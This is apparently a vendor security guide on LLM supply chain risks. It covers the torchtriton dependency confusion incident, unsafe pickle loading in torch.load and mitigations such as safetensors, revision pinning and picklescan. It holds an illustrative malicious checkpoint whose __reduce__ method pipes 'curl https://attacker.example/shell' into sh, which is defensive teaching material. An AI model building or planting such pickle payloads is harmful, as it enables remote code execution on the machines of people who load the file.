How does the PyTorch torchtriton supply chain attack work?

In December 2022, an attacker published a malicious package named torchtriton to the public PyPI index. PyTorch uses torchtriton as an internal dependency name for its triton GPU kernels. Because pip resolves packages from the public index before a private one if not configured otherwise, any machine running pip install torchtriton (or building a Docker image from PyTorch nightlies) fetched the attacker's version, which exfiltrated host information. The fix: pin dependencies to specific versions and hashes, and use --index-url to prioritize private indexes.

Why is torch.load() a security risk?

PyTorch's torch.load() uses Python's pickle protocol by default. Pickle is fundamentally unsafe for untrusted input because the __reduce__ method on any pickled class can specify an arbitrary Python callable to invoke during deserialization. An attacker who crafts a malicious .pt checkpoint file can execute arbitrary shell commands simply by having their file loaded. Mitigation: use torch.load(path, weights_only=True) or the safetensors format, which stores only raw tensor data with no code execution path.

What is the safetensors format and why is it safer than .pt files?

Safetensors is a model serialization format developed by Hugging Face that stores only tensor data in a simple binary layout. Unlike pickle-based formats ( .pt , .bin ), safetensors has no mechanism to embed executable Python objects — loading a safetensors file cannot trigger arbitrary code execution. Most popular models on Hugging Face Hub now offer safetensors variants. Use use_safetensors=True in AutoModel.from_pretrained() or from safetensors.torch import load_file directly.

How do I pin Hugging Face model versions in production?

Pass revision='<commit-sha>' to from_pretrained() . Every commit on Hugging Face Hub has an immutable SHA that cannot be overwritten, unlike branch names or tags. Find the commit SHA on the Hub's git history tab. For additional integrity, compute the SHA-256 hash of the downloaded model files and verify them on each deployment. Hugging Face also supports model signing with Sigstore for cryptographic provenance.

What is a dependency confusion attack and how does it affect LLM projects?

Dependency confusion (also called namespace confusion) occurs when a package manager resolves a private internal package name by accidentally fetching a public package of the same name at a higher version number. For LLM projects that use internal Python packages (data processing utilities, custom tokenizers, internal API clients), if those package names are also registered on public PyPI by an attacker at a higher version, pip install may silently install the attacker's version. Mitigation: use hash-locked requirement files ( pip-compile --generate-hashes ), configure --index-url to prioritize private indexes, or use --no-index for air-gapped production builds.

Should I audit Hugging Face Hub models before using them in production?

Yes. Run picklescan against any downloaded model files before loading them. Prefer safetensors-format models. Check the model card and repository provenance: is the organization verified? Does the model card explain the training data and methodology? For fine-tuned or community-uploaded models, the bar should be higher — treat them the same as a third-party Python package: review before use, pin the revision, and monitor for updates.

Is LLM03 covered by LLMArmor?

No. LLM03 supply chain risks involve artifact provenance, package integrity, and runtime behavioral analysis — none of which are detectable by inspecting Python source code. LLMArmor focuses on structural code patterns (LLM01, LLM05, LLM06, LLM07, LLM08, LLM10). For supply chain coverage, use pip-audit for dependency vulnerability scanning, picklescan for model file integrity, and Garak for behavioral backdoor probing.

LLM03: Supply Chain Vulnerabilities — Securing the LLM Software Supply Chain

In December 2022, PyTorch’s nightly build pipeline was compromised in a textbook dependency confusion attack. The package torchtriton — a legitimate PyTorch dependency — was shadowed by a malicious package of the same name on the public PyPI index. Anyone running pip install torchtriton fetched the attacker’s version, which exfiltrated /etc/passwd, SSH keys, and environment variables to a remote server. The malicious package was live for roughly 12 hours before PyTorch published a security advisory and pulled it. This wasn’t an attack on PyTorch’s model weights or training data — it was a supply chain attack on the Python packaging layer. In the LLM ecosystem, this attack surface is substantially wider: it includes model weights, fine-tuning datasets, embeddings, Hugging Face Hub repositories, quantized model files, and third-party agent plugins, each of which can be a vector for compromise.

What is LLM supply chain vulnerability?

OWASP LLM03 describes the risk that attacker-controlled artifacts enter the LLM application stack through the supply chain rather than through runtime inputs. The threat model covers four distinct layers:

Dependency layer. Python packages, JavaScript libraries, Docker base images, and Rust crates that your LLM application depends on. Dependency confusion, typosquatting, and compromised maintainer accounts all apply here. This is the most mature attack surface — the PyTorch torchtriton incident, the ctx and discordpy-self PyPI compromises, and the event-stream npm incident all fall into this category.

Model artifact layer. Pretrained model weights downloaded from Hugging Face Hub, model registries, or direct URLs. A model file can contain pickled Python objects that execute arbitrary code on deserialization. Hugging Face researchers documented multiple malicious model uploads that used pickle serialization to embed os.system() calls inside .pt and .bin files. Downloading and loading such a file with torch.load() is equivalent to running an unsigned binary.

Dataset and fine-tuning layer. Training datasets hosted on Hugging Face Hub, S3 buckets, or third-party providers. A poisoned dataset can embed behavioral backdoors that activate on specific trigger phrases — see LLM04 for the model poisoning angle. From a supply chain perspective, the risk is provenance: if you cannot verify the integrity of the dataset you fine-tuned on, you cannot make behavioral guarantees about the resulting model.

Plugin and tool layer. Third-party LangChain tools, LlamaIndex integrations, AutoGPT plugins, and OpenAI Actions schema definitions. A plugin that your agent loads at runtime has the same privilege level as a Python import — if it is compromised or malicious, it can execute arbitrary code in your application’s process.

The exploit: malicious model artifact

Consider a data science team that pulls a popular quantized model from Hugging Face Hub without pinning a specific revision:

# VULNERABLE: unpinned model download, unsafe deserialization
from transformers import AutoModelForCausalLM, AutoTokenizer
import torch

# VULNERABLE: no revision pin — latest commit could be compromised
model = AutoModelForCausalLM.from_pretrained("some-org/some-model")
tokenizer = AutoTokenizer.from_pretrained("some-org/some-model")

# VULNERABLE: torch.load without weights_only=True — arbitrary code execution
checkpoint = torch.load("./checkpoints/finetuned.pt")  # VULNERABLE: pickle RCE
model.load_state_dict(checkpoint)

An attacker who gains write access to some-org/some-model on Hugging Face Hub — through a compromised token, social engineering, or a malicious pull request — can push a new model revision. Because the code does not pin a revision, the next container build or from_pretrained() call fetches the attacker’s version.

The torch.load() on line 11 is independently dangerous: any .pt file that reached the filesystem through an untrusted channel can contain a __reduce__-based pickle payload:

# Attacker-crafted malicious checkpoint (illustrative — do not run)
import pickle, os

class MaliciousPayload:
    def __reduce__(self):
        # This executes when unpickled by torch.load()
        return (os.system, ("curl https://attacker.example/shell | sh",))

import torch
torch.save(MaliciousPayload(), "malicious_checkpoint.pt")
# torch.load("malicious_checkpoint.pt")  → executes the shell command

The exploit: dependency confusion

# VULNERABLE: no hash pinning, no private index enforcement
# torchvision==0.15.0        ← legitimate package
# llm-utils==1.2.0           ← internal package name, also published to public PyPI by attacker

# pip install -r requirements.txt
# If your private package "llm-utils" is also available on PyPI (higher version),
# pip may resolve to the public (malicious) package depending on index priority.

The dependency confusion attack works because pip resolves packages from the public index first when no explicit --index-url or --extra-index-url priority is configured. For internal packages that share names with packages the attacker has published to PyPI at a higher version number, pip silently installs the attacker’s version.

Mitigations

M1: Pin model revisions and verify checksums

Always pin Hugging Face model downloads to a specific commit SHA, and verify the file hash of any downloaded artifact:

import hashlib
from huggingface_hub import hf_hub_download
from transformers import AutoModelForCausalLM, AutoTokenizer

# SAFE: pinned to a specific commit SHA — immune to repo overwrites
PINNED_REVISION = "a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2"
EXPECTED_SHA256 = "deadbeef..."  # compute from a known-good download

model = AutoModelForCausalLM.from_pretrained(
    "meta-llama/Llama-3.1-8B",
    revision=PINNED_REVISION,   # SAFE: immutable git commit hash
)
tokenizer = AutoTokenizer.from_pretrained(
    "meta-llama/Llama-3.1-8B",
    revision=PINNED_REVISION,
)

# SAFE: verify downloaded artifact hash before loading
def verified_load(path: str, expected_sha256: str) -> bytes:
    data = open(path, "rb").read()
    actual = hashlib.sha256(data).hexdigest()
    if actual != expected_sha256:
        raise ValueError(f"Checksum mismatch: expected {expected_sha256}, got {actual}")
    return data

M2: Use safetensors instead of pickle-based formats

The safetensors format stores tensor data only — it cannot embed executable Python code. Prefer it for any model weights you load at runtime:

from safetensors.torch import load_file
import torch

# VULNERABLE: pickle-based loading
checkpoint = torch.load("model.pt")                      # VULNERABLE: RCE risk

# SAFE: safetensors — no code execution possible
tensors = load_file("model.safetensors")                 # SAFE: pure tensor data

# For transformers, prefer safetensors-backed models
from transformers import AutoModelForCausalLM
model = AutoModelForCausalLM.from_pretrained(
    "mistralai/Mistral-7B-v0.1",
    use_safetensors=True,        # SAFE: loads .safetensors files only
)

M3: Audit Python dependencies with pip-audit and lock files

Maintain a locked requirements.txt with hash verification, and run pip-audit in CI to catch packages with known CVEs:

# Generate a locked requirements file with hashes
pip-compile requirements.in --generate-hashes -o requirements.txt

# Audit for known vulnerabilities
pip-audit -r requirements.txt

# Enforce hash checking at install time (CI/CD)
pip install --require-hashes -r requirements.txt

# pyproject.toml / pip.conf — enforce private index priority
# SAFE: private index takes precedence; public PyPI only as fallback
# pip.conf:
# [global]
# index-url = https://pypi.company.internal/simple/
# extra-index-url = https://pypi.org/simple/
# no-index = false  # set true to block public PyPI entirely for production images

M4: Scan model files before loading

Use picklescan to detect malicious pickle payloads in model files before loading them:

# Install and run PickleScan on a directory of downloaded models
pip install picklescan
picklescan -p ./models/

# Output for a clean model:
# No dangerous pickle imports found in 3 files
# Output for a malicious model:
# Malicious pickle imports found in models/finetuned.pt:
#   Global import: posix / system

import subprocess, sys

def safe_load_checkpoint(path: str) -> dict:
    # SAFE: scan before loading
    result = subprocess.run(
        ["picklescan", "-p", path, "--exit-code"],
        capture_output=True,
    )
    if result.returncode != 0:
        raise RuntimeError(f"PickleScan detected malicious content in {path}")
    import torch
    return torch.load(path, weights_only=True)  # SAFE: scan + weights_only

Detecting LLM03 with LLMArmor

LLM03 involves compromised artifacts in the supply chain — model files, Python packages, datasets. This requires provenance tracking and runtime scanning rather than static analysis of Python source code. LLMArmor’s AST-based scanner does not currently cover supply chain risks.

For comprehensive supply chain coverage, use complementary tools:

pip-audit — scans installed packages against OSV and PyPI advisory databases
safety — similar to pip-audit, with additional commercial feeds
PickleScan — detects malicious pickle imports in model files
Hugging Face model signing — Sigstore-based signatures for model artifacts
Garak — runtime behavioral probing to detect backdoored models

pip install llmarmor
llmarmor scan ./src

LLMArmor will still catch LLM01, LLM05, LLM06, LLM07, LLM08, and LLM10 patterns in your application code. For supply chain hygiene, combine it with the tools above.

Frequently asked questions

How does the PyTorch torchtriton supply chain attack work?: In December 2022, an attacker published a malicious package named torchtriton to the public PyPI index. PyTorch uses torchtriton as an internal dependency name for its triton GPU kernels. Because pip resolves packages from the public index before a private one if not configured otherwise, any machine running pip install torchtriton (or building a Docker image from PyTorch nightlies) fetched the attacker's version, which exfiltrated host information. The fix: pin dependencies to specific versions and hashes, and use --index-url to prioritize private indexes.
Why is torch.load() a security risk?: PyTorch's torch.load() uses Python's pickle protocol by default. Pickle is fundamentally unsafe for untrusted input because the __reduce__ method on any pickled class can specify an arbitrary Python callable to invoke during deserialization. An attacker who crafts a malicious .pt checkpoint file can execute arbitrary shell commands simply by having their file loaded. Mitigation: use torch.load(path, weights_only=True) or the safetensors format, which stores only raw tensor data with no code execution path.
What is the safetensors format and why is it safer than .pt files?: Safetensors is a model serialization format developed by Hugging Face that stores only tensor data in a simple binary layout. Unlike pickle-based formats (.pt, .bin), safetensors has no mechanism to embed executable Python objects — loading a safetensors file cannot trigger arbitrary code execution. Most popular models on Hugging Face Hub now offer safetensors variants. Use use_safetensors=True in AutoModel.from_pretrained() or from safetensors.torch import load_file directly.
How do I pin Hugging Face model versions in production?: Pass revision='<commit-sha>' to from_pretrained(). Every commit on Hugging Face Hub has an immutable SHA that cannot be overwritten, unlike branch names or tags. Find the commit SHA on the Hub's git history tab. For additional integrity, compute the SHA-256 hash of the downloaded model files and verify them on each deployment. Hugging Face also supports model signing with Sigstore for cryptographic provenance.
What is a dependency confusion attack and how does it affect LLM projects?: Dependency confusion (also called namespace confusion) occurs when a package manager resolves a private internal package name by accidentally fetching a public package of the same name at a higher version number. For LLM projects that use internal Python packages (data processing utilities, custom tokenizers, internal API clients), if those package names are also registered on public PyPI by an attacker at a higher version, pip install may silently install the attacker's version. Mitigation: use hash-locked requirement files (pip-compile --generate-hashes), configure --index-url to prioritize private indexes, or use --no-index for air-gapped production builds.
Should I audit Hugging Face Hub models before using them in production?: Yes. Run picklescan against any downloaded model files before loading them. Prefer safetensors-format models. Check the model card and repository provenance: is the organization verified? Does the model card explain the training data and methodology? For fine-tuned or community-uploaded models, the bar should be higher — treat them the same as a third-party Python package: review before use, pin the revision, and monitor for updates.
Is LLM03 covered by LLMArmor?: No. LLM03 supply chain risks involve artifact provenance, package integrity, and runtime behavioral analysis — none of which are detectable by inspecting Python source code. LLMArmor focuses on structural code patterns (LLM01, LLM05, LLM06, LLM07, LLM08, LLM10). For supply chain coverage, use pip-audit for dependency vulnerability scanning, picklescan for model file integrity, and Garak for behavioral backdoor probing.

OWASP LLM Top 10 Guide Complete guide to all 10 LLM risks with mitigations.

OWASP Coverage Reference Rule-by-rule breakdown of what LLMArmor detects.

LLM04: Data and Model Poisoning Backdoors, trigger-based attacks, and poisoned RLHF — the model side of supply chain risk.

LLM01: Prompt Injection How prompt injection chains with supply chain compromise for critical-severity exploits.

LLMArmor vs garak Static analysis vs dynamic probing for supply chain behavioral risks.

Quick Start Scan your LLM application code in 5 minutes.